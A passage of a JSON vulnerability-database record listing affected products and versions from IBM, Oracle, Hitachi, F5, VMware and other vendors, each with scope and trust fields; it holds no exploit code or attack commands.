            "vendor": "ibm",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.0.3"
          },
          {
            "_id": null,
            "model": "campaign",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "campaign",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.3"
          },
          {
            "_id": null,
            "model": "retail allocation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "infosphere master data management collaborative edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "-10.0"
          },
          {
            "_id": null,
            "model": "tiered storage manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.1.1-00"
          },
          {
            "_id": null,
            "model": "qradar siem mr2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2"
          },
          {
            "_id": null,
            "model": "device manager software (solaris(sp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.4.0-08"
          },
          {
            "_id": null,
            "model": "device manager software",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "8.0.0-06"
          },
          {
            "_id": null,
            "model": "business process manager express",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.5"
          },
          {
            "_id": null,
            "model": "endpoint manager for remote control",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1.0"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.0.39"
          },
          {
            "_id": null,
            "model": "vcenter server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "tuning manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.1.0-00"
          },
          {
            "_id": null,
            "model": "predictive insight",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "big-ip edge gateway",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.2.4"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.0.23"
          },
          {
            "_id": null,
            "model": "social media analytics",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.2"
          },
          {
            "_id": null,
            "model": "device manager software (linux(sles",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.4.0-07"
          },
          {
            "_id": null,
            "model": "tivoli integrated portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.2"
          },
          {
            "_id": null,
            "model": "arx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "tivoli workload scheduler distributed",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.4"
          },
          {
            "_id": null,
            "model": "campaign",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5"
          },
          {
            "_id": null,
            "model": "global link manager software (linux(rhel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.6.1-01"
          },
          {
            "_id": null,
            "model": "retail allocation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.2"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.0.15"
          },
          {
            "_id": null,
            "model": "device manager software )",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.1.1-03"
          },
          {
            "_id": null,
            "model": "tivoli workload scheduler z/os connector",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.1"
          },
          {
            "_id": null,
            "model": "application manager for smart business",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.2.1"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.0.31"
          },
          {
            "_id": null,
            "model": "jdeveloper",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.3.5.0"
          },
          {
            "_id": null,
            "model": "lotus expeditor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.2.3"
          },
          {
            "_id": null,
            "model": "big-ip aam",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.5.1"
          },
          {
            "_id": null,
            "model": "device manager software (linux(rhel",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "8.0.0-06"
          },
          {
            "_id": null,
            "model": "jp1/performance management web console",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-09-00-08"
          },
          {
            "_id": null,
            "model": "linux ia-64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "retail returns management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "14.0"
          },
          {
            "_id": null,
            "model": "jp1/performance management web console",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-08-11-01"
          },
          {
            "_id": null,
            "model": "business process manager standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.0"
          },
          {
            "_id": null,
            "model": "big-ip edge gateway",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.0"
          },
          {
            "_id": null,
            "model": "utilities framework",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "4.2.0.3.0"
          },
          {
            "_id": null,
            "model": "device manager software (solaris",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.1.1-03(x64))"
          },
          {
            "_id": null,
            "model": "retail back office 12.0.9in",
            "scope": null,
            "trust": 0.3,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "device manager software )",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.0-00"
          },
          {
            "_id": null,
            "model": "tivoli netcool configuration manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.4"
          },
          {
            "_id": null,
            "model": "real-time decision platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "filenet content manager content engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.2.0"
          },
          {
            "_id": null,
            "model": "rational application developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.2"
          },
          {
            "_id": null,
            "model": "jp1/performance management web console",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-09-10"
          },
          {
            "_id": null,
            "model": "jp1/performance management web console",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-09-00-07"
          },
          {
            "_id": null,
            "model": "tiered storage manager software (linux(sles",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.1.0-00"
          },
          {
            "_id": null,
            "model": "network satellite server (for rhel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6)5.5"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.0.31"
          },
          {
            "_id": null,
            "model": "filenet p8 platform content search engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.5.1"
          },
          {
            "_id": null,
            "model": "rational application developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.05"
          },
          {
            "_id": null,
            "model": "infosphere master data management collaborative edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "-11.0"
          },
          {
            "_id": null,
            "model": "rational application developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5.55"
          },
          {
            "_id": null,
            "model": "tivoli netcool configuration manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.3"
          },
          {
            "_id": null,
            "model": "security qradar",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2.2"
          },
          {
            "_id": null,
            "model": "tivoli foundations for application manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.2"
          },
          {
            "_id": null,
            "model": "infosphere master data management server for product information",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "retail returns management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.1"
          },
          {
            "_id": null,
            "model": "infosphere information server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "connections",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.5.0.0"
          },
          {
            "_id": null,
            "model": "identity manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "11.1.1.5"
          },
          {
            "_id": null,
            "model": "waveset",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "8.1.1"
          },
          {
            "_id": null,
            "model": "tivoli identity manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "big-ip edge gateway hf3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2"
          },
          {
            "_id": null,
            "model": "big-ip aam",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.4.0"
          },
          {
            "_id": null,
            "model": "network satellite server (for rhel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6)5.4"
          },
          {
            "_id": null,
            "model": "jp1/performance management web console",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-08-11"
          },
          {
            "_id": null,
            "model": "jdeveloper",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "11.1.24.0"
          },
          {
            "_id": null,
            "model": "tiered storage manager software (linux(rhel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "8.0.0-00"
          },
          {
            "_id": null,
            "model": "tivoli netcool configuration manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "jp1/performance management web console",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-08-00-11"
          },
          {
            "_id": null,
            "model": "tivoli storage productivity center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.1.1.4"
          },
          {
            "_id": null,
            "model": "tuning manager software",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "8.0.0-06"
          },
          {
            "_id": null,
            "model": "tuning manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.402"
          },
          {
            "_id": null,
            "model": "tiered storage manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.2.1-00"
          },
          {
            "_id": null,
            "model": "device manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.2.1-01"
          },
          {
            "_id": null,
            "model": "big-ip aam",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.4.1"
          },
          {
            "_id": null,
            "model": "tiered storage manager software (linux(rhel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.0.1-02"
          },
          {
            "_id": null,
            "model": "big-ip webaccelerator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.00"
          },
          {
            "_id": null,
            "model": "secure analytics 2012.1r7",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "juniper",
            "version": null
          },
          {
            "_id": null,
            "model": "tuning manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.4.0-03"
          },
          {
            "_id": null,
            "model": "tuning manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.1-00"
          },
          {
            "_id": null,
            "model": "device manager software (solaris(op",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.4.0-00"
          },
          {
            "_id": null,
            "model": "tivoli storage productivity center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.1.1.2"
          },
          {
            "_id": null,
            "model": "retail back office",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "12.0"
          },
          {
            "_id": null,
            "model": "connections",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "insurance ifrs analyzer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "178.0.7"
          },
          {
            "_id": null,
            "model": "smart analytics system",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "56001"
          },
          {
            "_id": null,
            "model": "financial transaction manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "tivoli storage manager administration center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "rational insight",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.0.11"
          },
          {
            "_id": null,
            "model": "retail markdown optimization",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.1"
          },
          {
            "_id": null,
            "model": "secure analytics",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "juniper",
            "version": "2013.2"
          },
          {
            "_id": null,
            "model": "big-ip edge gateway",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.2.1"
          },
          {
            "_id": null,
            "model": "websphere lombardi edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2"
          },
          {
            "_id": null,
            "model": "distributed marketing",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.2"
          },
          {
            "_id": null,
            "model": "infosphere balanced warehouse c4000",
            "scope": null,
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "device manager software (solaris",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.1-00(x64))"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.0.33"
          },
          {
            "_id": null,
            "model": "fusion middleware",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "11.1.17.0"
          },
          {
            "_id": null,
            "model": "rational application developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.03"
          },
          {
            "_id": null,
            "model": "sitescope",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "11.24"
          },
          {
            "_id": null,
            "model": "rational reporting for development intelligence",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.0.5"
          },
          {
            "_id": null,
            "model": "websphere partner gateway express edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.0.3"
          },
          {
            "_id": null,
            "model": "tiered storage manager software (linux(sles",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.0.1-02"
          },
          {
            "_id": null,
            "model": "retail central office",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.4"
          },
          {
            "_id": null,
            "model": "retail markdown optimization",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.0"
          },
          {
            "_id": null,
            "model": "terasoluna server framework for java",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ntt data",
            "version": "2.0.51"
          },
          {
            "_id": null,
            "model": "campaign",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.3"
          },
          {
            "_id": null,
            "model": "distributed marketing",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "tiered storage manager software (linux(sles",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.4.0-08"
          },
          {
            "_id": null,
            "model": "tivoli storage productivity center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.2.2.177"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.0.45"
          },
          {
            "_id": null,
            "model": "rational application developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.01"
          },
          {
            "_id": null,
            "model": "big-ip webaccelerator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "connections",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.0.0.0"
          },
          {
            "_id": null,
            "model": "tuning manager software (linux(suse",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "8.0.0-06"
          },
          {
            "_id": null,
            "model": "utilities framework",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "4.1.0.1.0"
          },
          {
            "_id": null,
            "model": "communications metasolv solution",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "6.2.10.0"
          },
          {
            "_id": null,
            "model": "primavera p6 enterprise project portfolio management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "filenet p8 platform content search engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "raplication manager software (linux(rhel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "8.0.0-00"
          },
          {
            "_id": null,
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "rational application developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5"
          },
          {
            "_id": null,
            "model": "retail returns management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "big-ip edge gateway hf2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "retail invoice matching",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.2"
          },
          {
            "_id": null,
            "model": "rational application developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.06"
          },
          {
            "_id": null,
            "model": "portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "liferay",
            "version": "6.2.1"
          },
          {
            "_id": null,
            "model": "rational application developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.02"
          },
          {
            "_id": null,
            "model": "big-ip edge gateway",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.1"
          },
          {
            "_id": null,
            "model": "business process manager standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5.0"
          },
          {
            "_id": null,
            "model": "xp7 global link manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.6.0-02"
          },
          {
            "_id": null,
            "model": "secure analytics 2014.2r2",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "juniper",
            "version": null
          },
          {
            "_id": null,
            "model": "rational reporting for development intelligence",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.01"
          },
          {
            "_id": null,
            "model": "big-ip webaccelerator hf5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.0"
          },
          {
            "_id": null,
            "model": "rational application developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.09"
          },
          {
            "_id": null,
            "model": "rational reporting for development intelligence",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.0.21"
          },
          {
            "_id": null,
            "model": "raplication manager software (linux(suse",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "8.0.0-06"
          },
          {
            "_id": null,
            "model": "tivoli integrated portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.1.115"
          },
          {
            "_id": null,
            "model": "retail invoice matching",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "14.1"
          },
          {
            "_id": null,
            "model": "tivoli application dependency discovery manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2.2"
          },
          {
            "_id": null,
            "model": "linux mips",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "tiered storage manager software (linux(rhel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.1.0-00"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.0.19"
          },
          {
            "_id": null,
            "model": "portal 6.2.1-ce-ga2-securit",
            "scope": null,
            "trust": 0.3,
            "vendor": "liferay",
            "version": null
          },
          {
            "_id": null,
            "model": "tivoli dynamic workload console",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.1"
          },
          {
            "_id": null,
            "model": "tiered storage manager software (linux(sles",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.3.0-00"
          },
          {
            "_id": null,
            "model": "primavera p6 enterprise project portfolio management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "8.2"
          },
          {
            "_id": null,
            "model": "big-ip edge gateway hf1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.2.1"
          },
          {
            "_id": null,
            "model": "fusion middleware",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "11.1.21.0"
          },
          {
            "_id": null,
            "model": "rational application developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.16.2"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.0.25"
          },
          {
            "_id": null,
            "model": "primavera p6 enterprise project portfolio management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "8.4"
          },
          {
            "_id": null,
            "model": "leads",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "device manager software (solaris(sp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.1.0-00"
          },
          {
            "_id": null,
            "model": "utilities framework",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "4.3.0.2.0"
          },
          {
            "_id": null,
            "model": "infosphere balanced warehouse d5100",
            "scope": null,
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "tiered storage manager software (linux(rhel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.6.1-05"
          },
          {
            "_id": null,
            "model": "security threat response manager 2013.2r8",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "juniper",
            "version": null
          },
          {
            "_id": null,
            "model": "tivoli system automation application manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.2"
          },
          {
            "_id": null,
            "model": "rational application developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5.3"
          },
          {
            "_id": null,
            "model": "rational application developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.08"
          },
          {
            "_id": null,
            "model": "primavera p6 enterprise project portfolio management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "15.2"
          },
          {
            "_id": null,
            "model": "tuning manager software )",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.401"
          },
          {
            "_id": null,
            "model": "big-ip webaccelerator hf3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "business process manager advanced",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.0"
          },
          {
            "_id": null,
            "model": "tivoli storage productivity center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.1.1.0"
          },
          {
            "_id": null,
            "model": "tiered storage manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.0.0-00"
          },
          {
            "_id": null,
            "model": "business process manager express",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.0"
          },
          {
            "_id": null,
            "model": "device manager software )",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.0-00"
          },
          {
            "_id": null,
            "model": "device manager software (solaris(sp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.6.1-05"
          },
          {
            "_id": null,
            "model": "global link manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "8.0.0-00"
          },
          {
            "_id": null,
            "model": "rational application developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.3"
          },
          {
            "_id": null,
            "model": "rational application developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5"
          },
          {
            "_id": null,
            "model": "distributed marketing",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.6"
          },
          {
            "_id": null,
            "model": "knowledge",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "8.6.1"
          },
          {
            "_id": null,
            "model": "tiered storage manager software (solaris(sp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.0.0-00"
          },
          {
            "_id": null,
            "model": "sitescope",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "11.2"
          },
          {
            "_id": null,
            "model": "enterprise server x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "5"
          },
          {
            "_id": null,
            "model": "raplication manager software (solaris(x6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.6.1-05"
          },
          {
            "_id": null,
            "model": "connections",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1.0"
          },
          {
            "_id": null,
            "model": "campaign",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "tivoli storage manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.3.0"
          },
          {
            "_id": null,
            "model": "security siteprotector system",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "infosphere mashuphub",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "global link manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.2-01"
          },
          {
            "_id": null,
            "model": "rational application developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.04"
          },
          {
            "_id": null,
            "model": "device manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "8.0.0-00"
          },
          {
            "_id": null,
            "model": "raplication manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.6.1-05"
          },
          {
            "_id": null,
            "model": "global link manager software (solaris(x6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.6.1-01"
          },
          {
            "_id": null,
            "model": "tivoli storage manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "tiered storage manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.3-00"
          },
          {
            "_id": null,
            "model": "jp1/performance management web console",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-08-11-07"
          },
          {
            "_id": null,
            "model": "big-ip edge gateway hf5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.0"
          },
          {
            "_id": null,
            "model": "security siteprotector system",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "device manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "8.0.0-06"
          },
          {
            "_id": null,
            "model": "vcenter server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
